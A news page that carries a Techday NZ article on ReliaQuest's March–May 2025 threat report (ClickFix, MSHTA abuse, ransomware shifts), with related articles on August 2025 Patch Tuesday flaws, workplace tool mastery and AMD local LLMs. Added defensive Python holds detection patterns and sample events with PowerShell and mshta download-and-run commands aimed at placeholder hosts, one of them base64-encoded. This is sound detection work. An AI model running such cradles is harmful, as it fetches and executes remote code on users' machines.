ReliaQuest report exposes rise of social engineering cyber threats

Techday NZ, 19-06-2025
ReliaQuest has released its latest quarterly report, outlining identified trends in cyber attacker techniques, malware use, and ransomware group activity observed between March and May 2025 across its customer base.
ClickFix and social engineering tactics
One of the most notable trends identified in the report is the widespread use of ClickFix, a social engineering technique that tricks users into pasting attacker-supplied commands into PowerShell, a terminal or the Windows Run (Win+R) prompt. The lure is a fake problem, such as a bogus CAPTCHA or a failed Windows update, that the pasted command supposedly fixes. Because the victim launches the command under their own account from an interactive session, no attachment is opened and no exploit is needed, which lets attackers sidestep many mail and download controls and introduce malware with comparatively little effort.
This approach has driven increased use of malware families such as Lumma and SectopRAT, both of which abuse trusted, Microsoft-signed tools like MSHTA to fetch and run their payloads. The report notes that social engineering has significantly contributed to the rise of these attack vectors, stating, "Social engineering played a pivotal role in the success of these top tactics."
Lateral movement and initial access trends
Phishing-based techniques accounted for over half of the initial access incidents observed among customers, while drive-by compromise incidents rose by 10% compared to the previous period. The report describes a shift in which attackers increasingly rely on manipulating users rather than exploiting technical vulnerabilities.
ReliaQuest's analysis highlights that remote desktop protocol (RDP) has overtaken internal spear phishing as the leading method of lateral movement within networks. This shift is closely associated with attackers impersonating IT helpdesks to persuade users to install remote access tools. The report finds, "The shift away from tactics like internal spearphishing suggests attackers are favouring techniques that require less user interaction and offer more direct access to internal systems."
Additionally, drive-by downloads driven by campaigns such as ClickFix, together with widely available phishing kits, continue to lower the barrier to entry for cybercriminals. External remote services dropped from third to fourth place among initial access vectors, further illustrating the focus on exploiting human factors rather than exposed infrastructure.
MSHTA on the rise for defence evasion
MSHTA (Microsoft HTML Application Host, mshta.exe), a native, signed Windows binary that executes HTML Applications and inline script, was involved in 33% of defence evasion incidents during the period, up from just 3.1% a year earlier. Because the binary is legitimate and already present on every Windows host, attackers use it to slip past application controls and signature-based tools by convincing users to execute the malicious command themselves, typically via social engineering campaigns such as ClearFake.
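As an added example (this is not ReliaQuest's detection content or code), the following Python triage scores Windows process-creation events for the ClickFix and MSHTA patterns described above: a native binary spawned from an interactive parent (explorer.exe for a Win+R paste, a shell for a pasted line), mshta.exe handed a remote URL or inline javascript:/vbscript:, and PowerShell one-liners with hidden windows, encoded commands or download cradles, decoding -EncodedCommand so the cradle hidden inside it is scored too. It assumes Sysmon Event ID 1 style fields (Image, ParentImage, CommandLine); the events, paths and the example.invalid hostnames are constructed.

```python
"""Triage Windows process-creation events for ClickFix-style execution.

Added example, not ReliaQuest's detection logic. Assumes Sysmon Event ID 1 style
fields (Image, ParentImage, CommandLine); SAMPLE_EVENTS below are constructed and
example.invalid is a reserved placeholder domain.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import Optional

# Parents from which a user-typed command is launched: Win+R runs under explorer.exe,
# a pasted line runs under an interactive shell.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe"}
# Native binaries a ClickFix lure hands the pasted command to; mshta.exe is the one
# the report singles out.
LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
           "cscript.exe", "curl.exe", "certutil.exe", "bitsadmin.exe"}

URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
# Switches and download cradles typical of a pasted PowerShell one-liner.
PS_FLAGS_RE = re.compile(
    r"(?i)(-w(?:indowstyle)?\s+hidden"
    r"|-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"
    r"|-ep\s+bypass|-executionpolicy\s+bypass"
    r"|\biex\b|invoke-expression|downloadstring|invoke-webrequest|\biwr\b)")
ENC_RE = re.compile(r"(?i)-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{20,})")
MSHTA_INLINE_RE = re.compile(r'(?i)mshta(?:\.exe)?\s+"?(?:javascript|vbscript):')


@dataclass
class Finding:
    score: int
    reasons: list = field(default_factory=list)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Recover the plaintext of a -EncodedCommand argument (base64 of UTF-16LE)."""
    m = ENC_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _scan_powershell(text: str, label: str) -> Finding:
    f = Finding(0)
    for m in PS_FLAGS_RE.finditer(text):
        f.score += 1
        f.reasons.append(f"{label}: suspicious token {m.group(0)[:40]!r}")
    if URL_RE.search(text):
        f.score += 2
        f.reasons.append(f"{label}: remote URL in command")
    return f


def score_event(ev: dict) -> Finding:
    """Score one process-creation event; higher means more ClickFix-like."""
    image = _basename(ev.get("Image", ""))
    parent = _basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    f = Finding(0)
    if image in LOLBINS and parent in INTERACTIVE_PARENTS:
        f.score += 2
        f.reasons.append(f"{image} launched from interactive parent {parent}")
    if image == "mshta.exe":
        if URL_RE.search(cmd):
            f.score += 3
            f.reasons.append("mshta.exe given a remote URL")
        if MSHTA_INLINE_RE.search(cmd):
            f.score += 3
            f.reasons.append("mshta.exe with inline javascript:/vbscript: payload")
    if image in {"powershell.exe", "pwsh.exe"}:
        outer = _scan_powershell(cmd, "command line")
        f.score += outer.score
        f.reasons += outer.reasons
        decoded = decode_encoded_command(cmd)
        if decoded:  # score what the -enc blob actually runs, not just that it exists
            inner = _scan_powershell(decoded, "decoded -enc payload")
            f.score += inner.score
            f.reasons += inner.reasons
    return f


def triage(events, threshold: int = 4):
    """Return (index, Finding) for events scoring at or above the threshold."""
    return [(i, f) for i, ev in enumerate(events) if (f := score_event(ev)).score >= threshold]


# Constructed sample events (not real telemetry).
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/a.ps1')".encode("utf-16-le")
).decode("ascii")
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",  # Win+R paste from a fake CAPTCHA page
     "CommandLine": "powershell -w hidden -ep bypass -c \"iex (iwr 'https://example.invalid/fix.ps1' -UseBasicParsing)\""},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://example.invalid/verify/captcha.hta"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Vendor Agent\agent.exe",  # benign scheduled script
     "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\helpdesk.hta"'},  # local HTA, low score
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": f"powershell -nop -w hidden -enc {_ENCODED}"},
]

if __name__ == "__main__":
    for i, finding in triage(SAMPLE_EVENTS):
        print(i, finding.score, "; ".join(finding.reasons))
```

Feed it process events from Sysmon or your EDR and tune the weights to your estate. Note that the local .hta launch in the sample scores only 2: "mshta.exe from explorer.exe" on its own is a noisy alert condition, which is why the remote URL, inline script and decoded cradle carry the weight.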
"ClearFake's early adoption of ClickFix techniques propelled MSHTA from 16th to second place among defence evasion tactics. Recently, other ClickFix adopters have fuelled MSHTA's current surge, leveraging broader social engineering tactics to bypass defences more effectively," the report details.
Changes in ransomware operations
The report notes significant changes among ransomware groups, with the closure of "RansomHub" leading many affiliates to migrate to other groups, notably Qilin, which saw a 148% increase in activity. Play and Safepay also reported increased activity of 116% and 266%, respectively. The number of active ransomware groups has dropped by nearly 30%, but newer or established ransomware-as-a-service (RaaS) platforms have absorbed most of these affiliates, raising concerns over increasingly professionalised threats. "With major ransomware groups like RansomHub gone, RaaS operators are vying to capitalise on the influx of affiliates searching for new platforms. To attract this talent, we'll likely see RaaS platforms introduce innovative capabilities or revise profit-sharing models. This competition is expected to create a more fragmented yet increasingly sophisticated ransomware ecosystem, posing even greater challenges for defenders."
Impact on industry sectors
The construction industry was the only sector to see an increase in ransomware victims, rising by 15%. ReliaQuest attributes this to opportunistic targeting, as attackers seek out industries with perceived weaker defences. The report notes, "Construction organisations may feel compelled to pay ransoms quickly to avoid costly downtime and operational delays, making them attractive targets." By contrast, the retail sector saw a 62% decrease in victims, attributed to a drop-off in activity from the "CL0P" ransomware group's campaign against Cleo file-transfer software.
Malware trends and threat actor activity
The period saw increased activity by the SectopRAT malware, delivered via ClickFix and malvertising campaigns. Despite infrastructure takedowns in May 2025, Lumma infostealer operations continue, with new logs advertised on cybercriminal forums and marketplaces.
"Although Lumma's activity is likely to decline over the coming months as the impact of the takedown continues to unfold, it's likely the group could regain traction over time. As attention around the takedown diminishes, attackers may return to this familiar and well-established tool," the report comments.
Emergence of Scattered Spider
Scattered Spider, after a five-month hiatus, returned in April 2025 with attacks on UK retail organisations. The group is known for targeted social engineering against high-value individuals such as CFOs, and for combining on-premises tradecraft with cloud techniques to maintain stealth and control. "Scattered Spider's success lies in its ability to combine social engineering precision, persistence in cloud environments, and on-premises technical expertise. These TTPs allow the group to achieve initial access, maintain control, and operate stealthily, making it difficult for organizations to detect and remediate the group's activity in the early stages of an attack."
Recommendations and defensive measures
ReliaQuest's report makes several recommendations, including disabling the Windows Run (Win+R) prompt for non-administrative users, controlling which RDP and remote access tools can be installed, implementing web filtering, and prioritising user training against social engineering. Additional measures include strengthening identity verification, enabling advanced monitoring, and conducting regular risk assessments, particularly for privileged user accounts.
Looking ahead, the report anticipates broader adoption of ClickFix among ransomware affiliates, increased sophistication by groups such as Scattered Spider, and the continued rise of infostealer malware like Acreed.
The report concludes by emphasising the need for proactive investment in advanced detection, user education, and securing of both cloud and traditional infrastructure to counter an upward trend in attack complexity and evasion tactics.

Related Articles

August Patch Tuesday: Microsoft addressing 111 vulnerabilities

Techday NZ, 13 hours ago

Microsoft is addressing 111 vulnerabilities this August 2025 Patch Tuesday, a volume around the recent average. In a neat parallel with last month, Microsoft is aware of public disclosure for just one of the vulnerabilities published today, and claims no evidence of in-the-wild exploitation. Once again, the lone Patch Tuesday zero-day (here meaning a flaw disclosed publicly before a patch was available) is assessed as only moderate severity at time of publication, which brings Microsoft's lucky streak up to 11 months. Today's release includes nine critical remote code execution (RCE) vulnerabilities, although Microsoft has marked only one of these as more likely to see exploitation. Eight browser vulnerabilities were published separately earlier this month and are not included in the total.

What do attackers want in a Windows context? Domain admin! When do they want it? Now! Today's lone zero-day might be just what they need to break through the final layers of protection and swipe the crown jewels. CVE-2025-53779 is an elevation of privilege (EoP) vulnerability in the Windows implementation of Kerberos, exploited through abuse of dMSA configuration. The advisory FAQ provides more clues about the nature of the attack than many comparable Microsoft advisories, but misses a golden opportunity for clarity, since it never sets out what it means by dMSA, leaving us scouring for contextual clues. Ultimately, context makes it clear that today's hot topic is the Delegated Managed Service Account, rather than the Defender Microservices Architecture or some other piece of Microsoft paraphernalia with matching initials. Microsoft's motivation is unimpeachable: the dMSA supports automated rotation of credentials for service accounts, and is specifically designed to prevent credential harvesting via Kerberoasting. Indeed, CISA has described Kerberoasting as one of the most time-efficient ways to elevate privileges and move laterally throughout an organisation's network.
The good news is that successful exploitation of CVE-2025-53779 requires an attacker to have pre-existing control of two attributes of the (hopefully well protected) dMSA object: msds-groupMSAMembership, which determines which principals may retrieve the managed service account's credentials, and msds-ManagedAccountPrecededByLink, which lists the accounts the dMSA supersedes and can act on behalf of. However, abuse of CVE-2025-53779 is entirely plausible as the final link of a multi-exploit chain stretching from no access to total pwnage. Finally, note that Microsoft is publishing patches only for Windows Server 2025, because msds-ManagedAccountPrecededByLink was first implemented in Server 2025. Migrating to newer operating systems sooner rather than later remains good advice, but so is remediating zero-day vulnerabilities that could hand an attacker total control of your estate.

The publication of any pre-authentication RCE in Windows will naturally spark discussion. Of course, not all pre-auth RCEs are created equal, and while CVE-2025-50165 carries a hefty CVSSv3 base score of 9.8 and is certainly cause for concern, it is not the worst of the worst, since it presumably isn't wormable. Even so, a degree of alarm is amply justified, since the advisory FAQ mentions, twice, that user interaction isn't required. Exploitation is via a malicious JPEG file, which could be delivered inside an Office document or by other means; perhaps merely visiting a website or receiving an email in Outlook would suffice, although the advisory neither confirms nor denies these other routes. The malformed JPEG tricks the Windows Graphics Component into code execution via an untrusted pointer dereference. The execution context isn't specified, so in the standard spirit of caution, we'll assume SYSTEM.
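Returning to CVE-2025-53779, the actionable question for a defender is which principals already hold write rights over those two attributes on dMSA objects, since that is the precondition the advisory describes. As an added example, not code from the write-up or from Microsoft, the following Python evaluates access control entries exported from the directory and reports trustees who can write either attribute, and which of them control both on the same account. The record layout, the CORP\ group names and the records themselves are assumptions constructed for illustration; the attribute names and the dMSA object class are the real ones.

```python
"""Find non-privileged principals able to write the dMSA attributes CVE-2025-53779 needs.

Added example, not code from the write-up or from Microsoft. It works on ACE records
already exported from Active Directory; the record shape, the CORP\\ group names and
the records below are assumptions/constructed for illustration.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

DMSA_CLASS = "msds-delegatedmanagedserviceaccount"
# The two attributes the advisory says an attacker must already control.
SENSITIVE_ATTRS = {"msds-groupmsamembership", "msds-managedaccountprecededbylink"}
# Principals expected to hold write rights over service accounts (assumption: tune per domain).
EXPECTED_PRIVILEGED = {"nt authority\\system", "corp\\domain admins",
                       "corp\\enterprise admins", "builtin\\administrators"}
ATTRIBUTE_WRITE = {"writeproperty"}              # write scoped to one attribute
BLANKET_WRITE = {"genericwrite", "genericall",    # write every attribute ...
                 "writedacl", "writeowner"}       # ... or rewrite the DACL to grant it


@dataclass(frozen=True)
class Ace:
    object_dn: str
    object_class: str
    trustee: str
    right: str
    attribute: Optional[str] = None   # None: the ACE is not scoped to a single attribute


@dataclass(frozen=True)
class Finding:
    object_dn: str
    trustee: str
    attribute: str
    via: str


def dangerous_aces(aces: List[Ace]) -> List[Finding]:
    """One finding per (dMSA, trustee, sensitive attribute) write path held by a non-privileged trustee."""
    out: Set[Finding] = set()
    for a in aces:
        if a.object_class.lower() != DMSA_CLASS or a.trustee.lower() in EXPECTED_PRIVILEGED:
            continue
        right = a.right.lower()
        if right in ATTRIBUTE_WRITE and a.attribute and a.attribute.lower() in SENSITIVE_ATTRS:
            out.add(Finding(a.object_dn, a.trustee, a.attribute.lower(), right))
        elif right in BLANKET_WRITE and a.attribute is None:
            for attr in SENSITIVE_ATTRS:   # a blanket right implies control of both
                out.add(Finding(a.object_dn, a.trustee, attr, right))
    return sorted(out, key=lambda f: (f.object_dn, f.trustee, f.attribute))


def full_preconditions(aces: List[Ace]) -> Set[Tuple[str, str]]:
    """(dMSA, trustee) pairs controlling BOTH attributes, i.e. meeting the advisory's precondition."""
    seen: Dict[Tuple[str, str], Set[str]] = {}
    for f in dangerous_aces(aces):
        seen.setdefault((f.object_dn, f.trustee), set()).add(f.attribute)
    return {key for key, attrs in seen.items() if attrs == SENSITIVE_ATTRS}


# Constructed sample export (not from a real domain).
SVC_WEB = "CN=svc-web,CN=Managed Service Accounts,DC=corp,DC=example"
SVC_SQL = "CN=svc-sql,CN=Managed Service Accounts,DC=corp,DC=example"
SVC_OLD = "CN=svc-old,CN=Managed Service Accounts,DC=corp,DC=example"
DMSA = "msDS-DelegatedManagedServiceAccount"
SAMPLE_ACES = [
    Ace(SVC_WEB, DMSA, "CORP\\Domain Admins", "GenericAll"),
    Ace(SVC_WEB, DMSA, "CORP\\Helpdesk Tier1", "WriteProperty", "msDS-ManagedAccountPrecededByLink"),
    Ace(SVC_WEB, DMSA, "CORP\\Helpdesk Tier1", "WriteProperty", "msDS-GroupMSAMembership"),
    Ace(SVC_WEB, DMSA, "CORP\\Helpdesk Tier1", "WriteProperty", "description"),
    Ace(SVC_SQL, DMSA, "CORP\\App Owners", "GenericWrite"),
    Ace(SVC_SQL, DMSA, "CORP\\Backup Operators", "ReadProperty", "msDS-ManagedAccountPrecededByLink"),
    Ace(SVC_SQL, DMSA, "CORP\\Web Team", "WriteProperty", "msDS-GroupMSAMembership"),
    Ace(SVC_OLD, "msDS-GroupManagedServiceAccount", "CORP\\Helpdesk Tier1", "GenericAll"),  # gMSA, out of scope
]

if __name__ == "__main__":
    for f in dangerous_aces(SAMPLE_ACES):
        print(f"{f.trustee} can write {f.attribute} on {f.object_dn} via {f.via}")
    for dn, trustee in sorted(full_preconditions(SAMPLE_ACES)):
        print(f"PRECONDITION MET: {trustee} controls both attributes on {dn}")
```

In the sample, the helpdesk group holds both attribute-scoped writes on svc-web and the application owners hold GenericWrite on svc-sql, so both pairs satisfy the precondition, while the web team's single write on svc-sql is reported but does not. Treat every finding as a delegation to remove or justify, and remember that WriteDacl and WriteOwner count: a trustee who can rewrite the DACL can grant itself the attribute writes.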
This is hardly a new class of problem: cast your mind back a dozen years and consider the broadly similar MS13-096. However, the specific flaw underlying CVE-2025-50165 is presumably a recent introduction, since only Windows 11 24H2 and Server 2025 receive patches. Patch this one sooner rather than later, since it could provide a skilled attacker with a valuable foothold from which to launch further attacks, including perhaps even today's CVE-2025-53779.

Windows GDI+ (Graphics Device Interface Plus) sits at the centre of how almost all two-dimensional graphics are rendered on Windows. CVE-2025-53766 is a critical RCE in how GDI+ parses metafiles, a format often used to store vector graphics. An attacker can achieve code execution via a buffer overflow without privileges or user interaction. As with today's CVE-2025-50165, it's unlikely that this vulnerability is wormable, but the most alarming path to exploitation involves simply uploading a malicious metafile to a Windows machine running unspecified web services. There is no mention of SharePoint, Exchange, Office, or other non-Windows products in the Security Updates section of the advisory, but that still leaves an essentially limitless attack surface; for example, anyone running a custom application that accepts file uploads and then processes them with GDI+ could find themselves vulnerable to an attacker wielding a dodgy WMF file. On the bright side, the Preview Pane is not a vector in this case. A patch is available for Server 2008 but not Server 2012, a curious and possibly concerning pattern that we see from time to time with RCEs affecting the full historic range of Windows products.

Today is certainly a good day for fans of critical RCE vulnerabilities targeting weaknesses in how Windows interprets graphics. Exploitation of CVE-2025-50176, a flaw in the DirectX graphics kernel, could lead to execution in a kernel context.
Microsoft considers exploitation more likely, which may be why the advisory doesn't provide much information about the means of exploitation beyond a terse statement that type confusion is involved. Type confusion is where the kernel receives a pointer it expects to reference one type of object but which in fact references another, a bit like asking someone to read aloud from a restaurant menu, then handing them their secret diary and hoping they won't notice the difference. Most people will not be fooled, but under the right circumstances, anything is possible.

There are no significant changes to Microsoft product lifecycles this month. However, October will bring a flurry of changes, including the categorical end of support for non-LTSC versions of Windows 10.
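The upload path the write-up worries about for CVE-2025-53766 (a custom web application accepting files that a Windows component later parses) is where a content check belongs. As an added example, not code from the write-up or from Microsoft, the following Python allow-lists uploads by what the bytes actually are, so a WMF or EMF renamed to .jpg is refused before GDI+ ever sees it. The signatures are the documented WMF/EMF/JPEG/PNG header layouts; the hypothetical application's allow-list and the sample byte strings are constructed.

```python
"""Content-sniff image uploads so a renamed metafile never reaches a GDI+ code path.

Added example, not code from the write-up or from Microsoft. The signatures are the
public WMF/EMF/JPEG/PNG header layouts; the allow-list and sample bytes are constructed.
"""
from typing import FrozenSet, Tuple


def classify_image(data: bytes) -> str:
    """Return the real format of the bytes, ignoring whatever the filename claims."""
    # Placeable WMF: 32-bit key 0x9AC6CDD7 stored little-endian.
    if data.startswith(b"\xd7\xcd\xc6\x9a"):
        return "wmf"
    # Standard WMF header: Type (1 memory / 2 disk), HeaderSize 9, Version 0x0300.
    if len(data) >= 6 and data[0:2] in (b"\x01\x00", b"\x02\x00") and data[2:6] == b"\x09\x00\x00\x03":
        return "wmf"
    # EMF: EMR_HEADER record type 1 with the ' EMF' signature (0x464D4520) at offset 40.
    if len(data) >= 44 and data[0:4] == b"\x01\x00\x00\x00" and data[40:44] == b" EMF":
        return "emf"
    if data.startswith(b"\xff\xd8\xff"):
        return "jpeg"
    if data.startswith(b"\x89PNG\r\n\x1a\n"):
        return "png"
    return "unknown"


ALLOWED_FORMATS: FrozenSet[str] = frozenset({"jpeg", "png"})   # assumption: what this app accepts
EXTENSION_FORMAT = {"jpg": "jpeg", "jpeg": "jpeg", "png": "png"}


def accept_upload(filename: str, data: bytes, allowed: FrozenSet[str] = ALLOWED_FORMATS) -> Tuple[bool, str]:
    """Allow-list by content first, then require the extension to agree with the content."""
    fmt = classify_image(data)
    if fmt not in allowed:
        return False, f"rejected: content is {fmt}, not in {sorted(allowed)}"
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if EXTENSION_FORMAT.get(ext) != fmt:
        return False, f"rejected: extension .{ext} does not match {fmt} content"
    return True, fmt


# Constructed sample payloads (headers only, not real images).
PLACEABLE_WMF = b"\xd7\xcd\xc6\x9a" + bytes(18) + b"\x01\x00\x09\x00\x00\x03" + bytes(12)
STANDARD_WMF = b"\x01\x00\x09\x00\x00\x03" + bytes(12)
EMF = b"\x01\x00\x00\x00" + b"\x6c\x00\x00\x00" + bytes(32) + b" EMF" + bytes(64)
JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + bytes(8)
PNG = b"\x89PNG\r\n\x1a\n" + bytes(16)

if __name__ == "__main__":
    for name, blob in [("photo.jpg", JPEG), ("photo.jpg", PLACEABLE_WMF),
                       ("diagram.wmf", STANDARD_WMF), ("logo.png", EMF), ("photo.png", JPEG)]:
        print(name, accept_upload(name, blob))
```

Two caveats. This is a pre-filter, not a substitute for the patch: it blocks the renamed-metafile trick, but an application that legitimately accepts WMF or EMF still needs CVE-2025-53766 fixed. And it does nothing for CVE-2025-50165, where the hostile file is a valid JPEG; there the controls are patching and parsing untrusted images in an isolated, low-privilege process rather than in the web server itself.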

Master of the trade tools: The case for becoming a power user

Techday NZ, 06-08-2025

Just like builders are great with a hammer, and painters are great with a brush, we should be GREAT with the tools we use at work. Expert "power" users of tools are often more productive, perform better and have greater job satisfaction. Yet so many of us settle for being mediocre users of the systems we depend on every single day. If you want to be even more awesome than you already are, why not focus on mastering your trade tools? I'm talking about your laptop, mobile phone and software systems at your workplace. The difference between an average user and a power user isn't just marginal – it's transformational. The rise of new AI power tools just reinforces the strong benefits of becoming a power user.

The path to power user status

How do you develop your skills to become a super user and master these trade tools? The journey starts with mindset and motivation. Set a goal to be GREAT with the tools you need to use in your day-to-day work life. With a growth mindset, embrace experimentation and stay in that magic learning zone for part of your working week. Remember, every expert was once a beginner who refused to give up.

Start with the fundamentals. Your laptop and mobile phone are your primary workhorses. Learn the operating system properly – whether it's Windows or macOS for 99% of us. Master those handy keyboard shortcuts and mouse gestures that can shave seconds off every task. Those seconds add up to hours, which add up to days over the course of a year, and even more over your career. Here's something that might sound basic but is absolutely crucial: get your typing speed match-fit. This single skill will pay dividends in time savings for the rest of your career. You'll be faster at getting stuff done, period. In our digital-first world, your typing speed is like your running speed in athletics – it's foundational to everything else you do.
For each software product you rely on, whether it's Microsoft 365 or any other platform, a similar learning approach applies. Try things, learn the shortcuts, click on buttons and see what happens. Read the tool tips and help articles – they're there for a reason. Complete online learning courses when they're available. Don't be shy about asking your software vendor for suggestions – they want you to succeed with their product. YouTube videos can be incredibly helpful, though you'll need to sift through to find the quality content. And never underestimate the power of tapping your colleague on the shoulder and asking, "Hey, how do you do this?" Sometimes the person sitting next to you knows a trick that could save you hours every week.

As your new superpowers develop, something interesting happens. You become the expert that workmates come to for help. You become more productive and efficient with your time. You know the fastest way to get things done. You know when to use a hammer and when to use a jackhammer, and you're an expert at both.

The insurance broker's essential toolkit

For those in the insurance broking world, what are the most important trade tools you need to master? In my experience, there are four critical systems that form the backbone of successful insurance broking:

First, the Policy Management System (PMS) – what I like to call the "policy operating system." This is your primary system of record for the full lifecycle of policies and claims. It's where the magic happens, where relationships are managed, and where your business lives and breathes.

Second, a Document Management System (DMS) for workflow management and maintaining read-only, audited records of documents and client interactions. In our compliance-heavy industry, this isn't just helpful – it's essential.

Third, Microsoft 365 – email, documents, presentations, spreadsheets and online meetings.
These are the communication and collaboration tools that keep your business moving and your clients informed.

Fourth, your devices – laptop and mobile phone. These are your windows into all the other systems, and mastering them amplifies everything else you do.

JAVLN offers both the PMS and DMS solutions. Together, they form a powerful, cloud-based broker operating system that does many things, and we're investing to make it even better. We've also built important integrations with Microsoft 365 because we understand that your tools shouldn't work in isolation. This isn't just another technology pitch – it's about reimagining how brokerages operate. Our research found that 70% of brokers spend over three hours a day on admin tasks. That's not productive, and it's not what your clients are paying for. They want your expertise and advice, not your data entry skills. What makes our product vision different is how these tools integrate into a cohesive whole, where data flows seamlessly between platforms, eliminating redundancy and duplication and creating a single source of truth. When your systems talk to each other properly, you can focus on what you do best: advising clients and building relationships. We want to help our end users develop their broker superpowers, using JAVLN's software in combination with your other trade tools to give you a genuine boost in performance and productivity. This is the journey we're on together.

We practice what we preach at JAVLN

At JAVLN, we're living proof of the power user philosophy. Being a software company with staff spread around the world, our main trade tools are all cloud-based and integrated: Google Workspace for email, documents, presentations, spreadsheets and online meetings; Google Gemini for AI capabilities; Slack for team communication; Atlassian tools including JIRA and Confluence for project management and knowledge sharing; and of course, our laptops as the gateway to everything else.
Our trade tools are in the cloud, web-based, well integrated and secured with multi-factor authentication. We don't have servers in our office and we don't rely on VPNs or virtual desktop solutions. All these tools have handy companion apps on mobile phones too, meaning our team can be productive from anywhere. The result? By helping our teams adopt these tools as power users and use them to their full potential, we operate as a more productive business. We're more efficient with our time, we collaborate better as teams, and we can focus on delivering maximum value to our customers. We want our JAVLN customers to benefit from a similar setup, with trade tools purpose-built for brokers and all the jobs that need to be done in your daily workflow.

The AI revolution: Your new power tools

Where do AI tools fit into this picture? The recent rise of AI tools has been absolutely game-changing for those who have adopted them properly. The most popular for everyday use are Microsoft's Copilot, OpenAI's ChatGPT and Google's Gemini, but new tools are emerging constantly. Sticking with our analogy, AI represents a completely new category of power tool. If you already have a toolbox with standard power tools, AI tools are like adding a jackhammer or even a bulldozer to your arsenal. When used to their full potential, they provide enormous step changes in speed and quality, giving us genuinely superhuman capabilities. With great power comes great responsibility. That's why having a safe use policy in place is crucial – proper AI governance isn't optional in today's business environment. At JAVLN, we're driving forward with developing our employees to be "AI natives." We strongly encourage adoption of AI tools specific to each role and provide bite-sized training to build competency.
We want our employees to master these AI trade tools using a similar approach to learning any software system: experiment and try things, learn the shortcuts, read the documentation, complete training courses, ask vendors for guidance, watch quality YouTube content, and collaborate with colleagues. The learning approach remains the same, but the potential impact is exponentially greater.

The future belongs to the masters

Over the next few years, it would be fantastic to see our JAVLN customers become "AI natives" as well, and masters of their trade tools. It's a superhuman boost that can make insurance brokers better advisors. The professionals who master these tools will have a clear advantage – they'll analyse risks faster, generate proposals quicker, and provide clients with insights that used to take days to compile. This isn't futuristic thinking – these capabilities are available right now for those willing to learn. Your trade tools are waiting. The only question is: are you ready to master them?

AMD brings 128B LLMs to Windows PCs with Ryzen AI Max+ 395

Techday NZ, 31-07-2025

AMD has announced a free software update enabling 128 billion parameter large language models (LLMs) to be run locally on Windows PCs powered by the AMD Ryzen AI Max+ 395 (128GB) processor, a capability previously accessible only through cloud infrastructure. With this update, AMD is allowing users to deploy advanced AI models locally, bypassing the need for third-party infrastructure, which can provide greater control, lower ongoing costs, and improved privacy. The company says this shift addresses growing demand for scalable and private AI processing at the client device level. Previously, models of this scale, approaching GPT-3 size, were operable only within large-scale data centres.

The new functionality comes through an upgrade to AMD Variable Graphics Memory, included with the upcoming Adrenalin Edition 25.8.1 WHQL drivers. This upgrade leverages the 96GB of Variable Graphics Memory available on a Ryzen AI Max+ 395 128GB machine, supporting the execution of memory-intensive LLM workloads directly on Windows PCs.

A broader deployment

This update also makes the AMD Ryzen AI Max+ 395 (128GB) the first Windows AI PC processor to run Meta's Llama 4 Scout 109B model, with full vision and Model Context Protocol (MCP) support. The processor can hold all 109 billion parameters in memory, although the mixture-of-experts (MoE) architecture means only 17 billion parameters are active for any given token. The company reports output rates of up to 15 tokens per second for this model. According to AMD, the ability to handle such large models locally matters for users who require high-capacity AI assistants on the go. The system also supports flexible quantisation and can run a range of LLMs, from compact 1B parameter models to Mistral Large, using the GGUF format.
This isn't just about bringing cloud-scale compute to the desktop; it's about expanding the range of options for how AI can be used, built, and deployed locally. The company further states that performance in MoE models like Llama 4 Scout correlates with the number of active parameters, while dense models depend on the total parameter count. The memory capacity of the AMD Ryzen AI Max+ platform allows users to opt for higher-precision models, up to 16-bit weights, when the trade-off between quality and performance warrants it.

Context and workflow

AMD also highlights the importance of context size when working with LLMs. The AMD Ryzen AI Max+ 395 (128GB), equipped with the new driver, can run Meta's Llama 4 Scout at a context length of 256,000 tokens (with Flash Attention on and an 8-bit quantised KV cache), far exceeding the 4,096-token default in many applications. Examples provided include an LLM summarising extensive documents, such as an SEC EDGAR filing, requiring over 19,000 tokens to be held in context. Another example cited the summarisation of a research paper from arXiv, needing more than 21,000 tokens from query to final output. AMD notes that more complex workflows might require even greater context capacity, particularly for multi-tool and agentic scenarios. AMD states that while occasional users may manage with a 32,000-token context and a lightweight model, more demanding use cases will benefit from hardware and software that support expansive contexts, as offered by the AMD Ryzen AI Max+ 395 128GB.

Looking ahead, AMD points to an expanding set of agentic workflows as LLMs and AI agents become more widely adopted for local inferencing. Industry trends indicate that model developers, including Meta, Google, and Mistral, are increasingly integrating tool-calling capabilities into their training runs to facilitate local personal assistant use cases.
AMD also advises caution when enabling tool access for large language models, noting the potential for unpredictable system behaviour and outcomes: once a model can call tools, a hostile prompt or a poorly behaved model can act on the local system rather than merely produce text. Users are advised to install LLM implementations only from trusted sources. The AMD Ryzen AI Max+ 395 (128GB) is now positioned to support most models available through and other tools, offering flexible deployment and model selection options for users with high-performance local AI requirements.

DOWNLOAD THE APP

